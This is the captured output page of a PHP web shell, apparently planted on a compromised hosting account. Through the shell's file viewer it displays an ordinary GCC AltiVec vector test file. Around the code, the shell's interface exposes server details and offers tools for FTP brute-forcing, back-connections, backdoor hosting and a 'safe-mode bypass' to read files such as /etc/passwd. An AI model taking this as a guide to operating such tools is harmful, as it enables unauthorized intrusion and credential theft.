Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/vmx/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     debug-4.c (2.02 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#include <altivec.h>
vector unsigned char u8;
vector signed char s8;
vector bool char b8;
vector unsigned short u16;
vector signed short s16;
vector bool short b16;
vector unsigned int u32;
vector signed int s32;
vector bool int b32;
vector float f32;
vector pixel p16;

void f_u8(vector unsigned char *p) {
  u8 = vec_add(*p, *p);
}
void f_s8(vector signed char *p) {
  s8 = vec_add(*p, *p);
}
void f_b8(vector bool char *p) {
  b8 = vec_cmpgt(s8, s8);
  b8 = vec_xor(b8, *p);
}
void f_u16(vector unsigned short *p) {
  u16 = vec_add(*p, *p);
}
void f_s16(vector signed short *p) {
  s16 = vec_add(*p, *p);
}
void f_b16(vector bool short *p) {
  b16 = vec_cmpgt(s16, s16);
  b16 = vec_xor(b16, *p);
}
void f_u32(vector unsigned int *p) {
  u32 = vec_add(*p, *p);
}
void f_s32(vector signed int *p) {
  s32 = vec_add(*p, *p);
}
void f_b32(vector bool int *p) {
  b32 = vec_cmpgt(s32, s32);
  b32 = vec_xor(b32, *p);
}
void f_f32(vector float *p) {
  f32 = vec_add(*p, *p);
}
void f_p16(vector pixel *p) {
  p16 = *p;
}

int main() {
  vector unsigned char u8 = ((vector unsigned char){1, 2, 3, 4, 5, 6, 7, 8,
                           9, 10,11,12,13,14,15,16});
  vector signed char s8 = ((vector signed char){1, 2, 3, 4, 5, 6, 7, 8,
                           9, 10,11,12,13,14,15,16});
  vector bool char b8 = ((vector bool char){0, -1, 0, -1, 0, 0, 0, 0,
                       -1, -1, -1, -1, 0, -1, 0, -1});
  vector unsigned short u16 = ((vector unsigned short){1, 2, 3, 4, 5, 6, 7, 8});
  vector signed short s16 = ((vector signed short){1, 2, 3, 4, 5, 6, 7, 8});
  vector bool short b16 = ((vector bool short){-1, 0, -1, 0, -1, -1, 0, 0});
  vector unsigned int u32 = ((vector unsigned int){1, 2, 3, 4});
  vector signed int s32 = ((vector signed int){1, 2, 3, 4});
  vector bool int b32 = ((vector bool int){0, -1, -1, 0});
  vector float f32 = ((vector float){1, 2, 3, 4});
  vector pixel p16 = ((vector pixel){1, 2, 3, 4, 5, 6, 7, 8});
  f_u8(&u8);
  f_s8(&s8);
  f_b8(&b8);
  f_u16(&u16);
  f_s16(&s16);
  f_b16(&b16);
  f_u32(&u32);
  f_s32(&s32);
  f_b32(&b32);
  f_f32(&f32);
  f_p16(&p16);
  return 0;
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0057 ]--